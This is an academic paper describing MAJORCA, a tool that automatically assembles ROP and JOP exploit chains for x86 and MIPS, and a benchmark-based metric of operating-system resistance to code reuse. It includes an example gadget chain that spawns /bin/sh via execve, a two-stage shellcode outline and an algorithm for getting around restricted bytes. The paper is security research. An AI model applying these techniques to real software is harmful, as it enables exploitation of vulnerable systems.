# MAJORCA: Multi-Architecture JOP and ROP Chain Assembler

Alexey Nurmukhametov\*, Alexey Vishnyakov\*, Vlada Logunova\*† and Shamil Kurmangaleev\*

\*Ivannikov Institute for System Programming of the RAS

†Moscow Institute of Physics and Technology

Moscow, Russia

{nurmukhametov, vishnya, vlada, kursh}@ispras.ru

Abstract—Nowadays, exploits often rely on a code-reuse approach. Short pieces of code called gadgets are chained together to execute some payload. Code-reuse attacks can exploit vulnerabilities in the presence of operating system protection that prohibits data memory execution. The ROP chain construction task is the code generation for the virtual machine defined by an exploited executable. It is crucial to understand how powerful ROP attacks can be. Such knowledge can be used to improve software security. We implement MAJORCA that generates ROP and JOP payloads in an architecture agnostic manner and thoroughly consider restricted symbols such as null bytes that terminate data copying via strcpy. The paper covers the whole code-reuse payloads construction pipeline: cataloging gadgets, chaining them in DAG, scheduling, linearizing to the ready-torun payload. MAJORCA automatically generates both ROP and JOP payloads for x86 and MIPS. MAJORCA constructs payloads respecting restricted symbols both in gadget addresses and data. We evaluate MAJORCA performance and accuracy with ropbenchmark and compare it with open-source compilers. We show that MAJORCA outperforms open-source tools. We propose a ROP chaining metric and use it to estimate the probabilities of successful ROP chaining for different operating systems with MAJORCA as well as other ROP compilers to show that ROP chaining is still feasible. This metric can estimate the efficiency of OS defences.

Index Terms—return-oriented programming, jump-oriented programming, code-reuse attack, ROP, JOP, ROP benchmark, restricted symbols, payload, gadget, gadget frame, gadget catalog, ROP chain, ROP compiler.

#### I. INTRODUCTION

Modern software is rapidly developing. Programming languages with non-safety memory operations are on the scene yet. Despite the widely adopted security development lifecycle (SDL [1]), some errors continue to remain the security threat. There are automated techniques such as fuzzing [2, 3] and DSE [4–6] that search for crashes caused by errors. The exploitable errors are the most dangerous because they can grant unlimited access to the compromised machine.

Code-reuse attack techniques such as return-oriented programming (ROP [7]) and jump-oriented-programming

(JOP [8]) are powerful enough to perform Turing-complete computation. At first, code-reuse exploits were constructed manually, but this process gradually became automated with time. At the moment, the literature presents a set of approaches to automated code-reuse exploit construction [9–22]. The tools are even available for some of them [23–29].

Code-reuse attacks imply using code pieces from the program address space, also known as gadgets. Gadgets are linked in a chain that performs a malicious payload. The ROP chain is, in fact, a program for the virtual machine defined by an executable [30]. The stack pointer operates as a program counter of the virtual machine. Gadget addresses are the operation codes. They and their operands are located on the stack.

There are several mechanisms that protect against codereuse attacks: address space layout randomization (ASLR) and its fine-grained version [31], stack canaries, and control-flow integrity techniques. Despite that, code-reuse attacks can be extended to bypass some of them. For example, BROP [32] can bypass DEP and ASRL using ROP gadgets or code-reuse attacks preserving control-flow (DOP [33]).

At the same time, OpenBSD decreases the number of ROP gadgets intentionally [34]. The reduction of gadgets does not guarantee the impossibility of ROP chaining but reduces its probability. It is also important to understand whether this reduction makes a difference for more sophisticated ROP chaining strategies than ROPgadget that was used to estimate an effect on ROP tooling in [34]. We propose a metric to estimate rough probability of successful ROP chaining. This metric is based on results across a portfolio of ROP compilers. The portfolio consists of ROPgadet [25], Ropper [28], Exrop [29], angrop [27], ROPium [26]. We discuss such a metric in detail in evaluation chapter VIII. Moreover, we extend the portfolio with MAJORCA that utilizes ROP and JOP gadgets.

We divide the process of code-reuse exploit generation into four stages: searching for gadgets in a program, determining gadgets semantics, combining gadgets in chains, and generat-

Nurmukhametov A., Vishnyakov A., Logunova V., Kurmangaleev Sh. MAJORCA: Multi-Architecture JOP and ROP Chain Assembler. 2021 Ivannikov ISPRAS Open Conference (ISPRAS), IEEE, 2021, pp. 37-46. DOI: 10.1109/ISPRAS53967.2021.00011.

© 2021 IEEE. Personal use of this material is permitted. Permission from IEEE must be obtained for all other uses, in any current or future media, including reprinting/republishing this material for advertising or promotional purposes, creating new collective works, for resale or redistribution to servers or lists, or reuse of any copyrighted component of this work in other works.

ing input data exploiting the vulnerability.

In the first stage, found gadgets constitute a gadget catalog [22]. After that, one derives the gadget semantics and catalogs them. There are three ways to present gadget semantics: parameterized semantic types [9], gadget summaries [19, 35, 36], gadget dependency graphs [20]. In the third stage, gadgets can be chained both by searching according to regular expression templates or considering their semantics. In some cases, if the set of gadgets in the catalog is Turing-complete [7, 10, 14, 37–39], then the gadgets can be used as the target architecture for a compiler [10, 13, 21]. Moreover, some approaches construct ROP chains with genetic algorithms [12], while others use SMT solvers [19, 27]. On the final stage, the generated ROP chain may be embedded in multi staged exploits [40, 41].

We search ROP and JOP gadgets and classify them by parameterized types [42] via instruction concrete interpretation. Classified gadgets constitute a gadget catalog that is processed by filtering and prioritizing. Filtering and prioritizing reduce search space. The gadget catalog is also extended by JOP combining. Search algorithm builds chains by searching for suitable gadgets and their combination considering their semantics. We also thoroughly consider restricted symbols both in gadget addresses and data.

It is crucial to take account of restricted symbols during chain generation. For example, if the strcpy function processes input data bytes, they cannot contain zero. It is worth noting that restricted symbols can be both in gadget addresses and in data. However, just a few authors consider restricted symbols in the chain generation methods [17].

The paper makes the following contributions:

- We present the method to automatically generate both ROP and JOP payloads in an architecture agnostic manner.
- 2) We present an algorithm that considers restricted symbols both in gadget addresses and data.
- 3) We implement presented techniques in MAJORCA that can generate both ROP and JOP chains for x86 and MIPS considering restricted symbols thoroughly.
- 4) We present rop-benchmark [43] to compare MAJORCA with open-source rop-compilers.
- 5) We propose ROP chaining metric and use it to estimate the probability of successful ROP chaining for different operating systems with the portfolio of ROP compilers.

#### II. GADGET CATALOGING

MAJORCA uses ROPGadget [25] to search for gadgets in binaries. It uses the back searching algorithm [7] that starts from every encountered ret instruction. The experiments led us to limit the depth by 40 bytes since the bigger value does not result in more gadgets. Furthermore, we discard gadgets containing halting instruction such as hlt, retf, retw, sti, cli, in, out. As a result of searching, we catalog the list of gadget virtual addresses.

Hereafter, we perform gadget classification, i.e., we determine semantics for every found gadget. Single gadget can sat-

TABLE I GADGET TYPES

| Type                                                                                                                          | Parameters                                                                                                             | Semantic description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       |  |  |  |  |  |  |  |  |
|-------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--|--|--|--|--|--|--|--|
| NoOp<br>Jump<br>MoveReg<br>LoadConst<br>Arithmetic<br>LoadMem<br>StoreMem<br>ArithLoad<br>ArithStore                          | AddrR InR, OutR OutR, Off InR1, InR2, OutR, o AddrR, OutR, Off AddrR, InR, Off AddrR, InR, Off, o AddrR, InR, Off, o   | Don't change memory or registers $IP \leftarrow AddrR$ $OutR \leftarrow InR$ $OutR \leftarrow [SP + Off]$ $OutR \leftarrow [nR1 \circ InR2]$ $OutR \leftarrow [AddrR + Off]$ $[AddrR + Off] \leftarrow InR$ $OutR \circ \leftarrow [AddrR + Off]$ $[AddrR + Off] \circ \leftarrow InR$                                                                                                                                                                                                                                                     |  |  |  |  |  |  |  |  |
| JumpMem<br>InitConst<br>Neg<br>ArithConst<br>InitMem<br>ShiftStack<br>StackPivot<br>ArithStack<br>GetSP<br>ArithSP<br>PushAll | AddrR, Off OutR, Val InR, OutR InR, OutR, Val, ∘ (+/⊕) AddrR, Val, Off, Size Off, ∘ (+/−) InR InR, ∘ OutR InR, OutR, ∘ | $\begin{split} & \text{IP} \leftarrow [\text{AddrR} + \text{Off}] \\ & \text{OutR} \leftarrow \text{Val} \\ & \text{OutR} \leftarrow -\text{InR} \\ & \text{OutR} \leftarrow \text{InR} \circ \text{Val} \\ & [\text{AddrR} + \text{Off}] \leftarrow \text{Val} \\ & \text{SP} \circ \leftarrow \text{Off} \\ & \text{SP} \leftarrow \text{InR} \\ & \text{SP} \circ \leftarrow \text{InR} \\ & \text{OutR} \leftarrow \text{SP} \\ & \text{OutReg} \leftarrow \text{InR} \circ \text{SP} \\ & \text{pushad} \ ; \ \text{ret} \end{split}$ |  |  |  |  |  |  |  |  |
| Don't preserve control flow                                                                                                   |                                                                                                                        |                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            |  |  |  |  |  |  |  |  |
| JumpSP<br>Call<br>CallMem<br>Int<br>Syscall                                                                                   | AddrR<br>AddrR, Off<br>Value                                                                                           | $\begin{split} & \text{IP} \leftarrow \text{SP} \\ & \text{IP} \leftarrow \text{AddrR} \\ & \text{IP} \leftarrow [\text{AddrR} + \text{Off}] \\ & \text{Send Interrupt Value} \\ & \text{System call} \end{split}$                                                                                                                                                                                                                                                                                                                         |  |  |  |  |  |  |  |  |

[Addr] - memory dereference at Addr

– binary operation

 $X \leftarrow Y$  means that final value of X equals to initial value of Y

 $X \mathrel{\circ} \leftarrow Y \text{ is short for } X \leftarrow X \mathrel{\circ} Y$ 

isfy many semantic gadget types which are defined as boolean postconditions with parameters. We extend the set of gadget types proposed by Schwartz et al. [9] by additional types [42]. Table I shows the list of gadget semantics. We execute a gadget on random input data to determine its semantics. We utilize the binary analysis framework (Trawl [44]) to implement classification in the architecture agnostic way. The gadget instructions are translated into an intermediate representation (Pivot [45, 46]). Then we track register and memory accesses during gadget instruction interpretation. Values are randomly initialized on the first access. As a result, we obtain the initial and final values of registers and memory. Based on these values, we suggest that the gadget has specific semantics (gadget type). For example, we should find a pair of registers such that the initial value of the first register equals the final value of the second one to assign the gadget to MoveReg. The interpretation runs several times with different input data. The incorrectly suggested gadget semantics are removed.

Classification does not guarantee that semantics hold for arbitrary input data. For the exact classification, formal verification must be performed [22]. We partially mitigate it by adding specific input data for corner cases [42]. However, the number of incorrectly classified gadgets is acceptable to the practical construction of ROP chains. As a result of gadget classification, we obtain the gadget catalog. It contains parametrized semantics, virtual addresses, machine instructions, side effects, gadget frame descriptions.

Side effects are clobbered registers because gadgets can

write into registers that are not included in semantic descriptions. Gadget frame is a convenient concept to place ROP chains on the stack. It is similar to the x86 stack frame. A chain of gadgets is assembled from frames. The gadget frame contains values of gadget parameters (e.g., the value loaded into the register from the stack) and the next gadget address. The frame beginning is determined by the value of the stack pointer before executing the first gadget instruction.

#### A. Gadget Preprocessing

Gadget catalog does not represent gadgets that load multiple values from the stack to registers at once, e.g., pop rax; pop rbx; pop rdi; ret<sup>1</sup>. We derive these semantics by combining several gadgets from the catalog. We find all gadgets that load registers and have same virtual address. The first gadget loads rax, the second one loads rbx, and the third one loads rdi. Based on these gadgets, we construct gadgets with any non-trivial combination of loadable registers: 1) rax, rbx, rdi; 2) rax, rbx; 3) rax, rdi; 4) rax; 5) rbx, rdi; 6) rbx; 7) rdi. Then we add them all into the catalog. We actually have several catalog entries for the same assembly but they have different sets of output and clobbered registers, e.g., the gadget loading rax and rbx has rdi as clobbered register, the gadget loading rax and rdi has rbx as clobbered register. The support of such gadgets is a key feature in comparison with Schwartz et al. [9].

MAJORCA can use both ROP and JOP gadgets. We combine every JOP gadget with a ROP gadget into a bigger gadget similar to ROPium [26] (ex. ROPGenerator). Every JOP gadget is complemented by the ROP gadget that loads the next address value to the jump target register. The ROP gadget output registers should not intersect with the JOP gadget input registers. For instance,

- pop rax ; pop rcx ; ret
- pop rdx ; jmp rcx.

The next gadget address is loaded from the stack to register rex by pop rex. The combined gadget is just the usual ROP gadget that can be used as any other ROP gadget.

We filter and prioritize gadgets [47] to reduce the ROP chain construction time. We get rid of a gadget if

- its frame size is bigger than the user-supplied or default limit (default value is 1000 byte),
- the gadget virtual address contains restricted symbols,
- the gadget is a duplicate of another gadget,
- the LoadConst gadget loads the subset of registers loaded by another gadget and another gadget clobbered registers are a subset of registers clobbered by gadget being removed, or
- the gadget has the same semantic type and parameters as another gadget and
  - it has a bigger frame size with the same clobbered register set, or
  - clobbered registers of another gadget are a subset of registers clobbered by the gadget to be removed.

To generate shorter chains, we remove gadgets that have bigger frame size. The removal of gadgets is the task of searching extremum in partially ordered sets because not every pair of gadgets of the same type are comparable.

After filtration, we score every gadget to sort them by quality. The formula to calculate score is  $score = clobberedBytes + \frac{10000000 \cdot FrameSize}{storedBytes}$  for gadget that write to memory,  $score = clobberedBytes + 10000000 \cdot FrameSize$  for others, where storedBytes — the number of bytes stored to memory, clobberedBytes — the number of bytes clobbered by a gadget, FrameSize — the gadget frame size. MAJORCA firstly selects gadgets with smaller frame size, less clobbered registers, and prefers memory writing gadgets that consume less frame size per written byte.

MAJORCA has a convenient API to request gadgets with specific types and parameters. It has an indexing and caching to speed up request time.

#### III. GADGETS DAG



Fig. 1. DAG of gadgets.

A directed acyclic graph allows describing gadget which can have multiple input and output edges. Vertices represent gadgets whereas edges are dependencies between them. Every edge is supplied with a parameter name and register. Edges express data flow through gadget parameters. There is also a special type of edge to express dependency between vertices with no actual data dependency. The list of output edges defines the gadgets DAG.

The example of DAG is shown in the Figure 1. It performs syscall and consists of the following gadgets:

```
LoadConst1: pop rax ; pop rdi ; pop rsi ; ret
LoadConst2: pop rdi ; pop rbp ; ret
StoreMem : mov [rdi], rbp ; ret
InitConst : xor rdx, rdx ; ret.
```

The LoadConst2 gadget loads the memory address and value '/bin/sh'. The StoreMem gadget reuses them to store '/bin/sh' into memory. The dependency edge from StoreMem to Syscall forces storing to memory before invoking syscall. The InitConst gadget initializes rdx register with zero. The LoadConst1 initializes rax, rsi, rdi registers as well. The Syscall gadget performs execve system call that invokes the system shell /bin/sh.

<sup>&</sup>lt;sup>1</sup>Hereafter, we will use Intel syntax for x86 assembly language.



Fig. 2. Schedule for DAG of gadgets.

#### IV. SCHEDULING

We should make the linear sequence of gadgets to prepare the gadgets DAG for running. The scheduling algorithm does that. It accounts for dependencies between vertices and register clobbering. The schedule for DAG should comply with the following (Figure 2):

- It should be a topological sort of DAG.
- If the b gadget uses the output register of the a gadget, then this register should not be clobbered by any gadgets in the schedule between a and b.

We utilize Algorithm 1 to schedule DAG. The algorithm maintains the stack of states. Each state is represented by a worklist wl (list of edges to schedule) and an already scheduled *chain* tail. Initially, stack contains one state with all input DAG edges (worklist) and an empty chain. The algorithm pops states form the stack while it is not empty. If registers on wl edges intersect, wl is discarded. Otherwise, we select node n from wl to schedule last and calculate  $wl' \leftarrow wl \setminus outs(n)$ . Thus, we choose gadget n that runs later than gadgets from wl'. The selected node n can be scheduled, iff all n output edges are in wl and gadget n does not clobber any register on edges from wl'. When n is scheduled, we append node nincoming edges to wl' and prepend gadget n to chain tail. If wl' is not empty, we push wl' and new *chain* tail to the stack. Otherwise, the algorithm yields successfully scheduled chain.

Having the schedule, we generate a shellcode chain with respect to frame sizes, next gadget addresses, and stack parameters. The generated chain keeps binary and human-readable representation. Human-readable representation is a python script (Appendix B) that can be run to obtain a binary chain. Chains can be concatenated with each other. For instance, a two-staged attack [48] can be obtained by concatenating the following chains:

- 1) Write a second stage shellcode to memory.
- 2) Call mprotect.
- 3) Call shellcode.

#### V. CHAIN GENERATION

#### A. Move Chains

The move chain [15] transfers values between registers. We construct a special graph to search for move chains. Vertices contain registers, while edges are gadgets of types MoveReg, ArithmeticConst, Neg. Locating the requested move chain is the task of finding the feasible path between corresponding vertices. Paths from In to Out registers are move chains from In register to Out register. The request to specific move chain creates the generator, which iteratively yields all possible requested move chains.

#### **Algorithm 1** The gadgets DAG scheduling algorithm.

```
Input: edges - list of DAG outgoing edges.
  stack \leftarrow empty stack
  stack.push((edges, empty chain))
  while stack is not empty do
      ▶ Worklist (list of edges to schedule) and chain tail
      wl, chain \leftarrow stack.pop()

ightharpoonup Check that edges registers in wl do not intersect
      if \bigcap e.reg = \emptyset then
          for all edge \in wl do
              \triangleright Select node n from worklist wl to schedule last
               n \leftarrow tail(edge)
               f \leftarrow True
               c \leftarrow 0
                                                                 \triangleright Check that outs(n) \subseteq wl
               wl' \leftarrow \text{empty list}
                                                                      \triangleright wl' \leftarrow wl \setminus outs(n)
               for all e \in wl do
                   if e \in outs(n) then
                         \leftarrow c + 1
                       if c=1 and e \neq edge then
                           Do not yield same schedule twice
                            f \leftarrow False
                           break
                   else
                       wl'.append(e)
              if f and c = len(outs(n)) and
                                                  \forall e \in wl', n \text{ does not clobber } e.reg \text{ then}
                   \triangleright Append node n incoming edges to wl'
                   wl' \leftarrow wl' + ins(n)
                   \triangleright Prepend node n gadget to chain
                   chain' \leftarrow n + chain
                   if wl' is empty then
                       yield chain'
                                                                                Yield schedule
                   else
                       stack.push((wl', chain'))
  return
                                                                           No more schedules
```

For example, the following move chain copies the value from eax to ebx register:

mov ecx, eax; retmov ebx, ecx; ret

#### B. Registers Initialization



Fig. 3. DAGs that load values into reg.

Creating chains for registers initialization is a fundamental task because any other chain is constructed by adding a single gadget to it, e.g., a function or system call (Section V-D), a store to memory (Section V-C). To generate the chain that initializes registers, we do the following:

- Lazily create all possible DAGs that load values to requested registers (Figure 3).
- Check whether it is possible to construct a schedule for the DAG (Section IV).
- If the schedule is constructed, then check whether it is possible to assign gadget stack parameters considering

restricted symbols (Section VI) in such a way that output edges would contain requested values.

• If stack parameters are assigned, then yield the DAG.

Further, we will refer to yielded DAGs as LoadDAGs.

We use move chains (Section V-A) to build LoadDAGs. Patterns for building them are shown in Figure 3. MC stands for MoveChain, LC — LoadConst, AR — Arithmetic. Value can be loaded into the register by moving it from another register. Value also can be obtained by arithmetic operation on two loaded registers. Moreover, the one arithmetic operand can be initialized with constant.



Fig. 4. The iterative selection of DAG for registers initialization.

The LoadDAG iterative selection algorithm consists of the following steps (Figure 4):

- 1) Select registers (a subset of all registers being initialized) that are moved by MC gadgets.
- 2) Select registers that AR gadgets calculate.
- Select inputs of arithmetic gadgets that are moved by MC gadgets.
- 4) Select registers that IC gadgets initialize by constants.
- 5) Select the exact cover of a set consisting of uninitialized registers. To generate exact covers, we use the DLX algorithm [49]. In Figure 4, subsets of the exact cover are shown as unfilled circles, gray circles, and dotted circles.
- Registers inside the same subset are loaded by one LC gadget.

#### C. Memory Initialization

We use two patterns depicted in Figure 5 to store values in memory. The first one consists of StoreMem gadget and LoadDAG, which initializes Addr and In registers. The selection of this pattern starts from StoreMems selection because they occur in binaries rarely than LoadDAGs.

The second pattern is proposed by Schwartz et al. [9] and consists of a gadget initializing memory and an arithmetic gadget (it is placed in the bottom part in Figure 5). First of all, InitMem initialize memory with constant. Further, ArithStore creates the desired value in the memory cell via



Fig. 5. DAG for storing values in memory.

some arithmetics. The second pattern also allows storing memory values containing restricted symbols since the restricted symbol can be represented as a result of binary arithmetic operation with two permitted symbols.

#### D. Function and System Calls

We construct the special DAG to perform function and system calls. Calls can have arguments such as integers, strings, and arrays (of integers, strings, and arrays). Depending on argument types, we create DAGs that write to memory, e.g., store strings to memory. Corresponding to the calling convention, we add DAGs that initialize registers with requested values. In the end, DAG is extended with a vertice which redirects control flow to called function (or system call). This vertice can be Jump or trivial such as the address placed on the stack. Jump allows redirecting control flow to the address containing restricted symbols. Some system calls have corresponding libc functions. We iterate over both of them (syscall and corresponding libc function) in such a case.

#### VI. RESTRICTED SYMBOLS

Input data, as well as an exploit, might be sanitized. For example, strcpy function stops copying data when a null byte is encountered, so null bytes could not be used inside code-reuse chains. Thereby some characters must not be presented in ROP chains. We call such symbols restricted symbols [17]. Both gadget addresses and values loaded by gadgets from the stack cannot contain restricted symbols.

To avoid such symbols, the tool should:

- Get rid of gadgets containing restricted symbols in addresses. The preprocessing step does this (Section II-A).
- Avoid placing values containing restricted symbols on the stack.
- Compute these values out of benign values. We consider this during registers initialization (Section V-B), memory initialization (Section V-C), and function calling (Section V-D).

We apply a dynamic programming approach to calculate operands of arithmetic operation, which do not contain restricted symbols. An algorithm for finding addends is listed in Algorithm 2. Operands of other arithmetic operations (— and xor) are calculated in a similar way. Algorithm 2 solves  $a+b+carry=c\ mod\ 256$ , where c is an i-th byte of value. It firstly searches for solution without overflow and then with

#### **Algorithm 2** Finding addends, which sum is value.

Input: value - sum value.

**Output:** Addends lv and rv, such that lv + rv = value and do not contain restricted symbols. Returns True and sets addends appropriately if such pair exists, returns False otherwise.

**Data:** A state is represented by a 4-tuple (i, lv, rv, carry), where i is a number of computed bytes in addends (lv and rv) and carry is carried from previous bytes addition.

```
stack \leftarrow empty \ stack
stack.push((0, 0, 0, 0))
while stack is not empty do
    \triangleright Solve a + b + carry = c \mod 256
    i, lv', rv', carry \leftarrow stack.pop()

ightharpoonup Get i-th byte of value
    c \leftarrow (value \gg (8*i)) \ \& \ 255
    d \leftarrow (256 + c - carry) \mod 256
    > Try to solve without overflow
    if carry = 0 or c \neq 0 then
         for a \leftarrow 0 to \lfloor \frac{d}{2} \rfloor do
              b \leftarrow (d-a) \mod 256
             if both a and b are not restricted symbols then
                  lv \leftarrow lv' \mid (a \ll (8*i)) 
 rv \leftarrow rv' \mid (b \ll (8*i)) 

    All bytes computed

                  if i + 1 = sizeof(value) then return True

    Add state without carry

                  stack.push((i+1, lv, rv, 0))
                 break
    > Try to solve with overflow
    if carry \neq 0 or c \neq 255 then
        if c \neq 0 then la \leftarrow \lfloor \frac{d}{2} \rfloor else la \leftarrow 0 for a \leftarrow 128 + la to 255 do
             b \leftarrow (256 + d - a) \mod 256
             if both a and b are not restricted symbols then
                 \begin{array}{l} lv \leftarrow lv' \mid (a \ll (8*i)) \\ rv \leftarrow rv' \mid (b \ll (8*i)) \end{array}
                  ▶ All bytes computed
                  if i + 1 = sizeof(value) then return True
                  \triangleright Add state with carry to (i+1)-th byte
                  stack.push((i+1, lv, rv, 1))
                 break
return False
```

overflow. If a or b contain restricted symbols, then they are skipped. Finally, the algorithm returns operands when all bytes are found.

#### VII. IMPLEMENTATION



Fig. 6. MAJORCA architecture

We implemented described techniques in MAJORCA (Multi Architecture JOP and ROP Chain Assembler) tool. It is a library written in Python that allows users to set up ROP chains via API calls. We support both Linux and Windows operating systems. It is a lightweight and simple implementation for special input language determining ROP chain. Moreover, these calls can be integrated into any Python script that users may utilize for exploit generation. MAJORCA supports x86 architecture (both 32 and 64-bit) and MIPS.

Figure 6 presents MAJORCA architecture. The binary is inputted into ROPGadget that searches for gadgets. All found gadgets transfer to the classification stage performed by gadget classifier implemented inside the binary analysis framework (Trawl [44]). MAJORCA gets all classified gadgets and performs JOP combining to extend the number of gadgets with JOP based. Then it performs filtering to shrink the search space and prioritizing to reduce searching time. As a result of filtering and prioritizing MAJORCA creates a gadget catalog. This catalog is massively utilized by requests for gadgets, so we create indexes and caches to reduce response time. MAJORCA contains components (DAG generators) that generate basic types of DAGs: move chains (MoveChain), memory initializing DAGs (StoreMemDAG), registers initializing DAGs (LoadDAG), jump DAGs (JumpDAG), and call DAGs ((Sys) CallDAG). The tool also contains the builder and scheduler that actually performs searching for feasible ROP chains.

In a typical scenario (see Appendix A), user creates a Python script that imports MAJORCA. First of all, they perform the catalog creation via API call (if needed, it calls external tools such as ROPGadget and gadget classifier). Then, they set up ROP chain to be generated. Finally, they start the iterative process of searching for a feasible (built and scheduled) ROP chain and save generated chains.

MAJORCA can generate two types of output by user request. The first one is just raw binary ROP chain data. The second one is a human-readable Python script that generates the same binary ROP chain (see Appendix B).

#### VIII. EVALUATION

We use rop-benchmark [43] to compare MAJORCA with open-source tools. The benchmark checks the workability of generated ROP chains. It provides reproducible environment for testing ROP chains, which perform system call <code>execve("/bin/sh", 0, 0)</code>. The benchmark supports Linux x86-64 and partially MIPS. It contains binaries from CentOS 7, Debian 10, OpenBSD 6.2, OpenBSD 6.4 as test suites.

The comparison result is represented in Table II. Four columns correspond to test suites. The first row contains the overall number of files (binaries and libraries) inside the test suite. The second row contains the number of files containing the system call gadget. The third row contains the number of files such that at least one tool successfully generates a workable ROP chain. The rows with tool results are divided into three columns that show:

1) OK — the number of files for which the generated ROP chain is workable, i.e., opens a shell.

 $\label{thm:table II} The comparison of tools which automatically generate ROP chains$ 

| Test suite<br>Number of files<br>Has syscall gadget<br>At least one OK<br>ROP chaining metric                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              | OpenBSD 6.4<br>410<br>98<br>45<br>0.46 |                             | OpenBSD 6.2<br>397<br>87<br>67<br>0.77 |                                       | Debian 10<br>689<br>139<br>127<br>0.91 |                              |                                         | CentOS 7<br>649<br>121<br>92<br>0.76 |                             |                                       |                             |                              |
|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------|-----------------------------|----------------------------------------|---------------------------------------|----------------------------------------|------------------------------|-----------------------------------------|--------------------------------------|-----------------------------|---------------------------------------|-----------------------------|------------------------------|
| Tool<br>ROPgadget [25]<br>Ropper [28]<br>Exrop [29]<br>angrop [27]<br>ROPium [26]<br>MAJORCA                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               | OK<br>2<br>3<br>0<br>10<br>18<br>43    | F<br>0<br>-<br>33<br>1<br>4 | TL<br>0<br>0<br>28<br>2<br>0           | OK<br>4<br>15<br>11<br>25<br>43<br>66 | F<br>0<br>-<br>27<br>2<br>6<br>0       | TL<br>0<br>0<br>13<br>3<br>1 | OK<br>7<br>53<br>76<br>86<br>103<br>124 | F<br>0<br>-<br>19<br>12<br>10<br>1   | TL<br>0<br>0<br>5<br>1<br>0 | OK<br>8<br>31<br>48<br>54<br>64<br>90 | F<br>0<br>-<br>8<br>9<br>11 | TL<br>0<br>0<br>12<br>0<br>0 |
| MAJORCA results for ROP chain generation with restricted symbol (slash – 2f)           Tool         OK         F         TL         OK         S         4         34         68         0 |                                        |                             |                                        |                                       |                                        |                              |                                         |                                      |                             |                                       |                             |                              |

- 2) F the number of files for which a generated ROP chain is not workable, i.e., it does not open a shell for some reasons. It is worth noting that the benchmark runs the ROP chain 10 times. If at least once it was not successful, then the ROP chain is not workable. Ropper has dashes in this column because it does not correctly signalize that chain generation failed.
- 3) TL the number of files, for which a tool runtime exceeds the time limit of 1 hour.

We propose to define a ROP chaining metric as follow:  $M = OK/HAS\_SYSCALL$ , where OK is the number of files such that at least one tool from the portfolio successfully generates a workable ROP chain, and  $HAS\_SYSCALL$  is the number of files containing the system call gadget. The smaller value M the better OS is defended from ROP chaining.

The Table II contains metric values for different operating systems (CentOS 7, Debian 10, OpenBSD 6.2, OpenBSD 6.4) in the row heading "ROP chaining metric". We can conclude that Debian 10 is less defended from ROP (and JOP) chaining than other operating systems. Moreover, the OpenBSD activity of reducing the number of gadgets noticeably reduces ROP chaining metric. However, almost half of binaries containing syscall gadgets can be used for successful ROP chaining.

Considering the results in Table II, we can conclude that MAJORCA outperforms other open-source tools. Besides, MAJORCA covers almost all successful cases of other tools. It does not cover only 8 binary files:

- 2 timeouts for OpenBSD clang binaries. It happens due to big file sizes. Later, we can add a simple heuristic for such huge files because they probably contain almost any gadgets, so the tool may have a special case to avoid excessive search.
- 2) 2 unworkable ROP chains were generated due to imprecise gadget classification.
- 3) 4 ROP chains were not generated because MAJORCA does not support gadgets ending with call instructions. It is a technical limitation that can be fixed in the future.

Tools represented in Table II do not support MIPS architecture. We benchmark MAJORCA for MIPS without them on

32-bit Malta Linux. MAJORCA successfully generates 112 ROP chains (OK) out of 529 files. Test files were acquired from Malta Debian OS. All of them contain syscall gadget. Unworkable ROP chains were not generated (F is 0). The only one ROP chain generation has a timeout (TL is 1).

Moreover, we updated rop-benchmark with tests containing restricted symbols. The last row in Table II contains results only for MAJORCA because other tools generate no workable payloads.

Even having banned slash symbol (2f), MAJORCA successfully generates a significant fraction of ROP chains generated without restricted symbols.

#### IX. CONCLUSION

In the paper we present techniques to construct ROP chains automatically. We implemented them in the MAJORCA tool. It can generate ROP chains for registers initialization, memory initialization, system and function calls for both x86 and MIPS architecture. The tool finds both ROP and JOP gadgets and classifies them by semantic types. After that, MAJORCA filters and sorts them by quality. It builds a graph of moves between registers. It also creates DAGs initializing memory and registers. Then, the tool iteratively selects DAGs to construct the requested ROP chain. In the end, MAJORCA generates the ROP chain by the first graph that has successfully been scheduled. The generated ROP chain output format is a Python script which is human readable and easily extendable with custom parts.

We developed algorithms that solve the task of generating ROP chains in the presence of restricted symbols. First of all, MAJORCA removes all gadgets containing restricted symbols in addresses. Secondly, we use arithmetic operations to obtain register or memory values containing restricted symbols. Arithmetic operands are calculated with the dynamic programming algorithm. Finally, MAJORCA redirects control flow with a jump gadget when the called address contains a restricted symbol. It is worth noting that no open-source tools solve this problem thoroughly.

MAJORCA shows better results than open-source tools, according to rop-benchmark results. We benchmarked them for

Linux x86-64 and MIPS. Besides, MAJORCA covers almost all successful cases of other tools. Moreover, we benchmarked MAJORCA with tests containing restricted symbols. Even having banned slash symbol (2f), MAJORCA successfully generates a significant fraction of ROP chains generated without restricted symbols.

We proposed the ROP chaining metric that allows to estimate the efficiency of defences for different operating systems. We can conclude that Debian 10 is less defended from ROP chaining than other considered operating systems. Whereas, OpenBSD noticeably improved defence moving from 6.2 to 6.4 version.

#### REFERENCES

- [1] M. Howard and S. Lipner, *The security development lifecycle*, 2006. [Online]. Available: http://msdn.microsoft.com/en-us/library/ms995349.aspx.
- [2] S. Sargsyan, J. Hakobyan, M. Mehrabyan, M. Mishechkin, V. Akozin, and S. Kurmangaleev, "ISP-Fuzzer: Extendable fuzzing framework," in 2019 Ivannikov Memorial Workshop (IVMEM), 2019, pp. 68–71. DOI: 10.1109/IVMEM.2019.00017.
- [3] A. Fioraldi, D. Maier, H. Eißfeldt, and M. Heuse, "AFL++: Combining incremental steps of fuzzing research," in *14th USENIX Workshop on Offensive Technologies (WOOT 20)*, USENIX Association, Aug. 2020. [Online]. Available: https://www.usenix.org/ system/files/woot20-paper-fioraldi.pdf.
